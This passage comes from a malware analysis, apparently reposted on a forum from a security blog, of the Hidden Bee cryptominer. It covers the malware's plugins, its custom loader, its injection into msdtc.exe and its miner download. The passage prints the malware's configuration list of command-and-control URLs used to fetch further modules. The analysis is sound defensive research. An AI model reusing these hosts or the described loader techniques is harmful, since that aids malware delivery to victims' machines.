Lua dispatcher, first described here.) When plugins are run, we can see some additional child processes created by the process running the coredll (in the analyzed case it is inside rundll32): Also it triggers a firewall alert, which means the malware requested to open some ports (triggered by netscan.api plugin): We can see that it started listening on one TCP and one UDP port: The plugins As mentioned in the previous section, the SPUTNIK filesystem contains three plugins: cloudcompute.api, deepfreeze.api, and netscan.api. If we convert them to PE, we can see that all of them import an unknown DLL: mpsi.dll. When we see the filled import table, we find out that the addresses have been filled redirecting to the functions from the previous NS module: So we can conclude that the previous element is the mpsi.dll. Although its export table has been destroyed, the functions are fetched by the custom loader and filled in the import tables of the loaded plugins. First the cloudcompute.api is run. This plugin retrieves from the filesystem a file named “/etc/ccmain.json” that contains the list of URLs: Those are addresses from which another set of modules is going to be downloaded: ["sstp://news.onetouchauthentication.online:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.club:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.icu:443/mlf_plug.zip.sig","sstp://news.onetouchauthentication.xyz:443/mlf_plug.zip.sig"] It also retrieves another component from the SPUTNIK filesystem: /bin/i386/ccmain.bin. This time, it is an executable in NE format (version converted to PE is available here: 367db629beedf528adaa021bdb7c12de) This is the component that is injected into msdtc.exe. The HiddenBee module mapped into msdtc.exe The configuration is also copied into the remote process and is used to retrieve an additional package from the C&C: This is the plugin responsible for downloading and deploying the Mellifera Miner: core component of the Hidden Bee. Next, the netscan.api loads module /bin/i386/kernelbase.bin (converted to PE: d7516ad354a3be2299759cd21e161a04) The miner in APT-style Hidden Bee is an eclectic malware. Although it is a commodity malware used for cryptocurrency mining, its design reminds us of espionage platforms used by APTs. Going through all its components is exhausting, but also fascinating. The authors are highly professional, not only as individuals but also as a team, because the design is consistent in all its complexity. Appendix https://github.com/hasherezade/hidden_bee_tools – helper tools for parsing and converting Hidden Bee custom formats https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/ Articles about the previous version (in Chinese): https://www.freebuf.com/column/174581.html https://www.freebuf.com/column/175106.html Our first encounter with the Hidden Bee: https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/ Sursa: https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/
      • 1
      • Upvote
×
×
  • Create New...